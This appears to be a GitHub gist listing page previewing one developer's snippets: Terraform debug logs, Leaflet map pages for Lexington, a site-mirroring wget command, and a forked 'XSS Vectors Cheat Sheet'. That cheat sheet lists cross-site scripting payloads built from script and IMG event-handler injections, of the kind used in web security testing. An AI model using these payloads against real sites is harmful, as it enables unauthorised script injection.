Skip to content

Instantly share code, notes, and snippets.

@eeeschwartz
eeeschwartz / output.md
Created February 7, 2020 15:23
Terraform Helm Provider Debug Output
�Terraform v0.12.19
Initializing plugins and modules...
2020/02/07 15:09:36 [DEBUG] Using modified User-Agent: Terraform/0.12.19 TFC/05d298ef7d
null_resource.custom: Destroying... [id=5949662627807692286]
null_resource.custom: Destruction complete after 0s
local_file.kubeconfig: Creating...
local_file.kubeconfig: Creation complete after 0s [id=44acd74f3c09bea017b7ce102c8f55926af749ea]
null_resource.custom: Creating...
null_resource.custom: Provisioning with 'local-exec'...
@eeeschwartz
eeeschwartz / xss_vectors.txt
Created October 11, 2019 16:32 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@eeeschwartz
eeeschwartz / keybase.md
Created April 26, 2019 19:56
keybase proof

Keybase proof

I hereby claim:

  • I am eeeschwartz on github.
  • I am eeeschwartz (https://keybase.io/eeeschwartz) on keybase.
  • I have a public key ASClCxNQlHFNrC8Z4cSRFgaTDZbVseVvz_kGd2oKciivuAo

To claim this, I am signing this object:

@eeeschwartz
eeeschwartz / diff-content-versions.js
Last active December 16, 2016 19:24
Diff bookmarklet
var $ = jQuery;
$.ajax({
url: $('link[rel="latest-version"').prop('href')
}).done(function(data){
var fullPageHTML = $.parseHTML(data);
var $contentB = $(fullPageHTML).find('.lex-region-content article');
$contentB.find('.workbench-moderation-entity-moderation-form').hide();
html2canvas($('.lex-region-content article'), {
@eeeschwartz
eeeschwartz / index.html
Last active November 12, 2016 20:03
leaf collection address lookup
<html>
<head>
<meta charset=utf-8 />
<title>Lexington Vacuum Leaf Collection Map</title>
<meta name='viewport' content='initial-scale=1,maximum-scale=1,user-scalable=no' />
<link rel="stylesheet" href="https://unpkg.com/leaflet@1.0.1/dist/leaflet.css" />
<link rel="stylesheet" href="https://unpkg.com/esri-leaflet-geocoder@2.1.4/dist/esri-leaflet-geocoder.css">
<style>
@eeeschwartz
eeeschwartz / clone-lexky.sh
Created July 30, 2016 11:44
Clone the previous lexingtonky.gov as a static site
wget --mirror --restrict-file-names=windows --wait=1 --restrict-file-names=windows --page-requisites --adjust-extension --no-parent --convert-links http://www.lexingtonky.gov
@eeeschwartz
eeeschwartz / boards-commissions.html
Last active July 23, 2016 21:14
Temp dump of boards and commissions
<div>
<div class="views-element-container contextual-region lex-block" id="block-views-block-department-directory-block-1">
<div>
<div class="contextual-region js-view-dom-id-85ba88981e23a376726877467b3bea3cb0cb9d97d2d5cd2d95946dca49f74772">
<div class="usa-unstyled-list">
<ul class="list lex-card-title lex-card-title-medium">
<li class="lex-filter-item lex-card"><span class="js-lex-filter-item "><a href="http://localhost:5000/index.aspx@page=2440.html">Administrative Hearing Board</a></span></li>
<li class="lex-filter-item lex-card"><span class="js-lex-filter-item "><a href="http://localhost:5000/index.aspx@page=3483.html">Affordable Housing Governing Board</a></span></li>
<li class="lex-filter-item lex-card"><span class="js-lex-filter-item "><a href="http://localhost:5000/index.aspx@page=2441.html">Agricultural Extension District Board</a></span></li>
<li class="lex-filter-item lex-card"><span class="js-lex-filter-item "><a href="http://www.bluegrassairport.com/administration.html">Airport Board</a></sp
@eeeschwartz
eeeschwartz / index.html
Last active July 21, 2016 18:08
List of meetings to scrape
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0041)http://lexingtonky.gov/index.aspx?page=17 -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<body>
<table id="_ctl0_listPanel" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td>
<div id="_ctl0_TableDiv" class="calendar_allinone">
<table class="listtable" cellspacing="0" rules="all" border="1" id="_ctl0_listDataGrid">
<tbody><tr class="listtable_header">
@eeeschwartz
eeeschwartz / index.html
Last active August 26, 2016 15:06
Esri-leaflet example: lexington council district 1
<!DOCTYPE html>
<html>
<head>
<!-- Load Leaflet from CDN-->
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.3/leaflet.css" />
<script src="http://cdn.leafletjs.com/leaflet-0.7.3/leaflet.js"></script>
<!-- Load Esri Leaflet from CDN -->
<script src="http://cdn.jsdelivr.net/leaflet.esri/1.0.0/esri-leaflet.js"></script>
@eeeschwartz
eeeschwartz / index.html
Last active May 24, 2016 21:08
Lexington address autocomplete
<html>
<head>
<meta charset=utf-8 />
<title>Searching map services</title>
<meta name='viewport' content='initial-scale=1,maximum-scale=1,user-scalable=no' />
<!-- Load Leaflet from CDN-->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/leaflet/1.0.0-rc.1/leaflet.css" />
<script src="https://cdn.jsdelivr.net/leaflet/1.0.0-rc.1/leaflet-src.js"></script>